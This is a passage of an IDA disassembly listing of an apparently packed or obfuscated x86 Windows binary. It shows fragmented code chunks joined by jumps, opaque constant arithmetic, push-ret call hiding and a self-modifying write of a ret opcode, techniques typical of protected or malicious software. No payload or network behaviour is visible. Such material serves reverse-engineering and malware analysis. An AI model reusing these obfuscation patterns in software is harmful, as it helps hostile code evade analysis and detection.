; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_43C8C4: ; CODE XREF: sub_452361-18101j
jmp loc_447C9C
; END OF FUNCTION CHUNK FOR sub_452361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_43C8C9: ; CODE XREF: sub_44E2E0+CAA3j
and edi, 6855C41Bh
cdq
loc_43C8D0: ; CODE XREF: ut7h7i2x:loc_4392A8j
mov eax, ecx
and edi, ecx
loc_43C8D4: ; CODE XREF: sub_44E2E0+CA97j
and edx, 0B60FB557h
cmp edx, 0E83FE1BAh
jmp loc_43B19C
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
loc_43C8E5: ; CODE XREF: ut7h7i2x:loc_459F19j
xor esi, 9CA83911h
call sub_44082D
jmp ds:dword_41D19C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_43C8F6: ; CODE XREF: sub_44825D-F118j
jmp loc_43CFD6
; END OF FUNCTION CHUNK FOR sub_44825D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_541. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push offset sub_4490E0
jmp locret_44D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4566A1
loc_43C906: ; CODE XREF: sub_4566A1:loc_459E31j
mov eax, [esp+0]
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_4566A1
; ---------------------------------------------------------------------------
db 0FEh
dword_43C910 dd 7AB5DDA7h ; DATA XREF: sub_444A12+6r
; sub_444A12:loc_44AD95r
; ---------------------------------------------------------------------------
loc_43C914: ; CODE XREF: ut7h7i2x:00458636j
jmp loc_44137D
; ---------------------------------------------------------------------------
loc_43C919: ; CODE XREF: ut7h7i2x:004571CAj
jmp loc_44EA60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_43C91E: ; CODE XREF: sub_439AE7+10j
jmp loc_43A45D
; END OF FUNCTION CHUNK FOR sub_439AE7
; =============== S U B R O U T I N E =======================================
sub_43C923 proc near ; CODE XREF: sub_410661+22p
; sub_41964D+29p ...
; FUNCTION CHUNK AT 0043E37A SIZE 00000005 BYTES
push ecx
push offset loc_4454A6
jmp loc_43E37A
sub_43C923 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_250. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_43C92F: ; CODE XREF: sub_44F57E+448Ej
jmp loc_4565D7
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43C934: ; CODE XREF: sub_43AA94+C0CFj
jmp loc_445BD4
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43C939: ; CODE XREF: sub_43D021+2j
rol eax, 12h
push ecx
mov ecx, eax
xchg ecx, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_43C943 proc near ; CODE XREF: sub_440B8A+5FF2p
; sub_44E5DC:loc_446BF3p
; FUNCTION CHUNK AT 0043F455 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441411 SIZE 0000000A BYTES
push ebp
jmp loc_43F455
sub_43C943 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_43C949: ; CODE XREF: sub_44825D:loc_44818Aj
push ecx
mov [ebp-4], eax
push 0B1CDD1B7h
pop eax
sub eax, 0CCBE4CB4h
rol eax, 0Dh
add eax, 66461149h
add eax, ebp
jmp loc_44729E
; END OF FUNCTION CHUNK FOR sub_44825D
; =============== S U B R O U T I N E =======================================
sub_43C969 proc near ; DATA XREF: sub_44EA97+4o
; FUNCTION CHUNK AT 00453D73 SIZE 00000005 BYTES
mov eax, edx
push esi
push offset sub_443F66
jmp loc_453D73
sub_43C969 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_43C976: ; CODE XREF: sub_44E6B4-C806j
mov [ecx], esi
jmp loc_4507BA
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45ADF0
loc_43C97D: ; CODE XREF: sub_45ADF0+Fj
jnz loc_4590A1
jmp sub_44871F
; END OF FUNCTION CHUNK FOR sub_45ADF0
; ---------------------------------------------------------------------------
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C98B proc near ; CODE XREF: sub_44DB79+7j
push ebp
mov ebp, esp
push ecx
push offset sub_44CAB9
jmp nullsub_104
sub_43C98B endp
; ---------------------------------------------------------------------------
xchg ecx, [eax]
push 2721D3AAh
jmp sub_43C2F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_43C9A5: ; CODE XREF: sub_448CBC:loc_43E9F9j
xor eax, edi
test ebp, 0D63BCEDDh
jmp loc_4518D0
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_43C9B2: ; CODE XREF: sub_4529E0:loc_450FB3j
call sub_455060
loc_43C9B7: ; CODE XREF: ut7h7i2x:0044B802j
jmp loc_450D2F
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
or eax, eax
jnz loc_458DD4
jmp loc_4455D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_43C9C9: ; CODE XREF: sub_4508DB+942Ej
push offset sub_45410C
jmp nullsub_404
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
loc_43C9D3: ; CODE XREF: ut7h7i2x:0044A52Bj
jz loc_44E0C6
jmp loc_441744
; ---------------------------------------------------------------------------
loc_43C9DE: ; DATA XREF: sub_4587DD:loc_43FFA7o
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_43AF9C, 0
jnz loc_43E5C6
jmp loc_450168
; =============== S U B R O U T I N E =======================================
sub_43C9F5 proc near ; CODE XREF: ut7h7i2x:004482E4j
; sub_44947D+1051Bp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D8D4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A164 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BA13 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C945 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F313 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453134 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456550 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004576AA SIZE 0000001C BYTES
xchg ebx, [esp+0]
pop ebx
add edx, ebp
add edx, 6C956010h
call sub_455CF9
loc_43CA06: ; CODE XREF: ut7h7i2x:loc_44E0DEj
push esi
call sub_43AD46
loc_43CA0C: ; CODE XREF: ut7h7i2x:00458D17j
jbe loc_456550
loc_43CA12: ; CODE XREF: ut7h7i2x:loc_445ABFj
mov eax, [ebp-8]
push ebx
mov ebx, eax
jmp loc_453134
sub_43C9F5 endp
; ---------------------------------------------------------------------------
shl ecx, 2
jmp sub_4586A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CBC2
loc_43CA25: ; CODE XREF: sub_44CBC2:loc_443749j
mov [ebp-8], eax
jmp loc_44B52F
; END OF FUNCTION CHUNK FOR sub_44CBC2
; =============== S U B R O U T I N E =======================================
sub_43CA2D proc near ; CODE XREF: sub_44CBC2-13A67p
; sub_43A513+D3Ep ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044309B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D0F SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00446236 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448025 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448E4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449FE3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B56B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044EE1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FFA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450243 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045034A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450923 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045261D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454779 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045739B SIZE 00000005 BYTES
jb sub_453C2C
call sub_443E2D
loc_43CA38: ; CODE XREF: sub_442B3B:loc_44324Aj
jge loc_448025
loc_43CA3E: ; CODE XREF: sub_456E7D-6D1Aj
jmp sub_449D3B
sub_43CA2D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440AF2
loc_43CA43: ; CODE XREF: sub_440AF2-6F9Fj
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_440AF2
; ---------------------------------------------------------------------------
test eax, edx
jmp loc_44801C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_43CA4F: ; CODE XREF: sub_45742F-16420j
jo loc_4537A6
xor edx, 9063484Ch
loc_43CA5B: ; CODE XREF: sub_45742F:loc_44EB58j
push 5BBAC6BEh
pop eax
and eax, 5F031C7Ch
jmp loc_4400A0
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_43CA6C: ; CODE XREF: sub_43CCC3+E486j
lea eax, [ebp-125h]
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_43CCC3
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_43CA75: ; CODE XREF: sub_43CE34:loc_440326j
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 0
jnz loc_43F665
loc_43CA81: ; CODE XREF: sub_441C6B:loc_4587B9j
call sub_4431E4
; END OF FUNCTION CHUNK FOR sub_43CE34
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_43CA86: ; CODE XREF: sub_44E5AB:loc_45599Ej
mov eax, ecx
pop ecx
add eax, 0E37C9143h
rol eax, 0Bh
add eax, 88703799h
cmp eax, 1FFACD92h
jmp loc_43A169
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
loc_43CAA3: ; CODE XREF: ut7h7i2x:loc_44FFB9j
push ebx
test ecx, 0E6DA6F7Bh
jmp loc_442F3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_43CAAF: ; CODE XREF: sub_43E592:loc_4499B4j
push offset sub_43BBF3
jmp loc_44B265
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
not ebp
sbb eax, 57D0EE90h
loc_43CAC1: ; CODE XREF: ut7h7i2x:0044A6F2j
jmp sub_446CA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589FE
loc_43CAC6: ; CODE XREF: sub_4589FE:loc_43D85Dj
sub edx, 0AAAFB8EBh
rol edx, 4
sub edx, 0E71B8196h
push offset sub_444038
jmp nullsub_350
; END OF FUNCTION CHUNK FOR sub_4589FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449744
loc_43CADF: ; CODE XREF: sub_449744:loc_44BBFCj
jl loc_453D2A
; END OF FUNCTION CHUNK FOR sub_449744
; START OF FUNCTION CHUNK FOR sub_453D07
loc_43CAE5: ; CODE XREF: sub_453D07-260Fj
jmp loc_457211
; END OF FUNCTION CHUNK FOR sub_453D07
; ---------------------------------------------------------------------------
shr eax, 5
cmp edi, eax
jmp loc_44F689
; =============== S U B R O U T I N E =======================================
sub_43CAF4 proc near ; CODE XREF: ut7h7i2x:loc_447808p
; ut7h7i2x:0044AE3Aj
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A28D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043A749 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043B6D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BCCA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043EEDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445C5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD31 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004530F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457F60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458078 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459125 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AAA6 SIZE 0000000F BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
push eax
lea eax, dword_449C7C
push eax
push eax
mov edx, eax
call sub_43F058
jmp loc_441B52
sub_43CAF4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43CB0D proc near ; CODE XREF: ut7h7i2x:00439E5Bj
; sub_459C45+9p
; FUNCTION CHUNK AT 0043E375 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441439 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450AD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451FDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457861 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_43D16F
jmp loc_451FDF
sub_43CB0D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp ds:off_41D074
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A65
loc_43CB30: ; CODE XREF: sub_443A65-208Cj
jmp loc_44F5D9
; END OF FUNCTION CHUNK FOR sub_443A65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_43CB35: ; CODE XREF: sub_449700-FC9Cj
jmp loc_44E812
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D17F
loc_43CB3A: ; CODE XREF: ut7h7i2x:loc_43E509j
; sub_44B122:loc_44059Cj ...
call sub_43DCFF
loc_43CB3F: ; CODE XREF: sub_453621+Dj
jmp nullsub_17
; END OF FUNCTION CHUNK FOR sub_43D17F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43CB44: ; CODE XREF: sub_447EB5:loc_444070j
push edx
push esi
call sub_439BF8
loc_43CB4B: ; CODE XREF: ut7h7i2x:0044D93Ej
call sub_44E84C
loc_43CB50: ; CODE XREF: ut7h7i2x:loc_449814j
jmp loc_43A4E2
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_43CB55: ; CODE XREF: sub_444029:loc_43E6A2j
jmp loc_450B12
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4593AA
loc_43CB5A: ; CODE XREF: sub_4593AAj
pop edx
mov eax, [esp-4+arg_0]
push edx
push eax
push 0D6DA049Ah
pop eax
xor eax, 0D60D11F6h
sub eax, 0BB70688Eh
jmp loc_4578D3
; END OF FUNCTION CHUNK FOR sub_4593AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523B3
loc_43CB77: ; CODE XREF: sub_4523B3:loc_44D7E5j
mov [ebx], edx
pop ebx
; END OF FUNCTION CHUNK FOR sub_4523B3
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_43CB7A: ; CODE XREF: sub_44DD39:loc_439E37j
mov eax, [ebp-0Ch]
call sub_45732D
loc_43CB82: ; CODE XREF: ut7h7i2x:00455250j
jg loc_444EBE
xchg edi, [esp+0]
pop edi
push 15765B21h
pop eax
jmp loc_453DAE
; END OF FUNCTION CHUNK FOR sub_44DD39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_43CB97: ; CODE XREF: sub_4529E0:loc_43B863j
and edx, 14B2BEC8h
test edx, 40000h
jmp loc_443A92
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_43CBA8: ; CODE XREF: sub_44C273+497Dj
js loc_448648
jo loc_44DC31
loc_43CBB4: ; CODE XREF: sub_44C273:loc_43D967j
push 0
push 0
jmp loc_45A7C3
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442C6B
loc_43CBBD: ; CODE XREF: sub_442C6B:loc_452755j
add ebx, 14006805h
popf
xchg ebx, [esp+0]
push offset sub_44AC40
jmp nullsub_512
; END OF FUNCTION CHUNK FOR sub_442C6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43CBD1: ; CODE XREF: sub_43D021+101B0j
pushf
add esi, 3D3D7E6Ch
push 0F61F0658h
jmp loc_43D86D
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43CBE2: ; CODE XREF: sub_457A66-E3A4j
sub al, 99h
push offset loc_44897C
jmp nullsub_308
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43CBEE: ; CODE XREF: sub_442B3B:loc_450BFDj
add edx, 50EC13BAh
mov edx, [edx]
loc_43CBF6: ; CODE XREF: sub_43C0DA+1E2A3j
shr edx, 3
mov ecx, ds:dword_4487F0
or [ecx+edx], al
push 0D7264EA9h
pop ecx
sub ecx, 0F3A7FA6Bh
jmp loc_445DCB
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_43CC13: ; CODE XREF: sub_455807-10A32j
cmp al, 0A4h
jz loc_453DF3
loc_43CC1B: ; CODE XREF: sub_4402A5+30EFj
jmp loc_445B54
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_43CC20: ; CODE XREF: sub_4549F0-D84Aj
jnz loc_450686
jbe loc_453F69
xor ecx, 0D2430B14h
cmp ebx, edx
jmp loc_45067A
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_43CC39: ; CODE XREF: sub_43DCFF:loc_43F1C7j
jl loc_4425CE
loc_43CC3F: ; CODE XREF: sub_43B106+1F56Dj
jmp loc_454626
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_43CC44: ; CODE XREF: sub_44B72F-52B1j
jmp loc_44E4E3
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
xor edi, ecx
mov [esi], eax
jmp loc_4425CE
; ---------------------------------------------------------------------------
pop eax
jmp sub_45548A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_43CC58: ; CODE XREF: sub_45A8C1-203B3j
rol edx, 2
cmp edx, 0C536BE60h
jmp loc_44C590
; END OF FUNCTION CHUNK FOR sub_45A8C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_43CC66: ; CODE XREF: sub_44941C+7CCEj
jl loc_44909A
xchg eax, ecx
jbe sub_43ABBA
mov [ecx], ebp
sbb eax, esi
rol eax, 2
jmp loc_44909A
; END OF FUNCTION CHUNK FOR sub_44941C
; ---------------------------------------------------------------------------
loc_43CC80: ; CODE XREF: ut7h7i2x:loc_456568j
mov eax, 0A7A44D83h
push edx
push 94F169FCh
pop edx
or edx, 54CD7A87h
rol edx, 1Fh
xor edx, 0A6DA2F0Ah
and edx, 2E135FEFh
jmp loc_454808
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_43CCA6: ; CODE XREF: sub_444273+389Fj
cmp eax, 3333A69Fh
jmp loc_45473F
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
jg loc_43AD27
jmp sub_44AD6F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43CCBD: ; CODE XREF: ut7h7i2x:00446CECj
jns loc_44F23C
; =============== S U B R O U T I N E =======================================
sub_43CCC3 proc near ; CODE XREF: sub_4594B7p
var_114 = dword ptr -114h
; FUNCTION CHUNK AT 004392DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A8BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C21A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043CA6C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043CE93 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D862 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DA9F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F936 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440A49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444BFA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00445F30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446620 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044735F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044848F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044A9B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AABD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AFBB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B10F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B146 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B18A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B3A9 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0044C767 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E93C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EBED SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044FB17 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00451836 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451FBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004539EE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455E04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004571EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004573A0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00458C30 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A93A SIZE 0000001B BYTES
xchg esi, [esp+0]
pop esi
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
jmp loc_445F30
sub_43CCC3 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_481. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450F0B
loc_43CCD6: ; CODE XREF: sub_450F0B+Fj
jmp loc_43F000
; END OF FUNCTION CHUNK FOR sub_450F0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43CCDB: ; CODE XREF: sub_439BF8+17B3Dj
jnp loc_457DFF
jmp loc_44CE55
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_43CCE6: ; CODE XREF: sub_449C6F-693Cj
mov byte ptr [eax], 0C3h
jmp sub_449C6F
; END OF FUNCTION CHUNK FOR sub_449C6F
; =============== S U B R O U T I N E =======================================
sub_43CCEE proc near ; CODE XREF: sub_414887+5Ep
; sub_41AFF3+6BBp ...
call sub_43CD08
jmp ds:off_41D07C
sub_43CCEE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4548FD
loc_43CCF9: ; CODE XREF: sub_4548FD+5j
jmp nullsub_429
; END OF FUNCTION CHUNK FOR sub_4548FD
; ---------------------------------------------------------------------------
loc_43CCFE: ; CODE XREF: ut7h7i2x:loc_43BF7Cj
jmp loc_45AAF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43CD03: ; CODE XREF: sub_439BF8+109Fj
jmp loc_43C2D3
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_43CD08 proc near ; CODE XREF: sub_43CCEEp
; sub_44939A:loc_45063Bj ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B5FF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043D7E8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044554B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448800 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF5A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00454781 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454CFF SIZE 0000001D BYTES
jnz loc_454781
pop edx
jmp loc_43B5FF
sub_43CD08 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
adc ecx, 0CAD85DFh
jmp loc_448CDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43CD1F: ; CODE XREF: sub_43FF65:loc_439EE1j
call sub_45883A
loc_43CD24: ; CODE XREF: sub_450472+2A22j
jmp loc_4527D7
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_43CD29: ; CODE XREF: ut7h7i2x:0044D8D7j
jle loc_44BF10
; =============== S U B R O U T I N E =======================================
sub_43CD2F proc near ; CODE XREF: sub_443816:loc_448F84p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044307F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446748 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446780 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
xchg ecx, [esp-4+arg_0]
jmp loc_446780
sub_43CD2F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [ebp+0], eax
jmp sub_43FF65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43CD44: ; CODE XREF: ut7h7i2x:00446D49j
jmp nullsub_511
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_43CD49: ; CODE XREF: sub_455060-19ABCj
jmp loc_457EFF
; END OF FUNCTION CHUNK FOR sub_455060
; =============== S U B R O U T I N E =======================================
sub_43CD4E proc near ; CODE XREF: ut7h7i2x:00457E0Dp
; ut7h7i2x:00458B6Cj
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00456FD2 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
loc_43CD52: ; CODE XREF: ut7h7i2x:0045081Aj
xchg edx, [esp-4+arg_0]
push offset sub_4492A1
jmp loc_456FD2
sub_43CD4E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43CD5F: ; CODE XREF: sub_43AB62:loc_43AFB3j
xor edi, 1875C6A3h
xchg edi, [ecx]
jmp loc_4518E6
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_43CD6C: ; CODE XREF: ut7h7i2x:00448A7Dj
xchg ebx, [esp]
jmp loc_44E56F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_311. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45612F
loc_43CD75: ; CODE XREF: sub_45612F-3B99j
jmp loc_447510
; END OF FUNCTION CHUNK FOR sub_45612F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453A91
loc_43CD7A: ; CODE XREF: sub_453A91:loc_453AA2j
jnz loc_458FAF
jmp loc_44D4C3
; END OF FUNCTION CHUNK FOR sub_453A91
; ---------------------------------------------------------------------------
loc_43CD85: ; CODE XREF: ut7h7i2x:004421B3j
pop ebx
and ebx, ds:4000F8h
or ebx, 81B59818h
cmp ebx, 0C00288C8h
jmp loc_44294A
; ---------------------------------------------------------------------------
js loc_444F2D
jmp sub_44947D
; ---------------------------------------------------------------------------
loc_43CDA8: ; DATA XREF: sub_44615D:loc_44A846o
jmp loc_44D721
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44615D
loc_43CDAD: ; CODE XREF: sub_44615D+3j
; sub_44825D+A632j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_44615D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A907
loc_43CDB0: ; CODE XREF: sub_45A907-1B9Ej
jmp loc_458275
; END OF FUNCTION CHUNK FOR sub_45A907
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448DD9
loc_43CDB5: ; CODE XREF: sub_448DD9+Fj
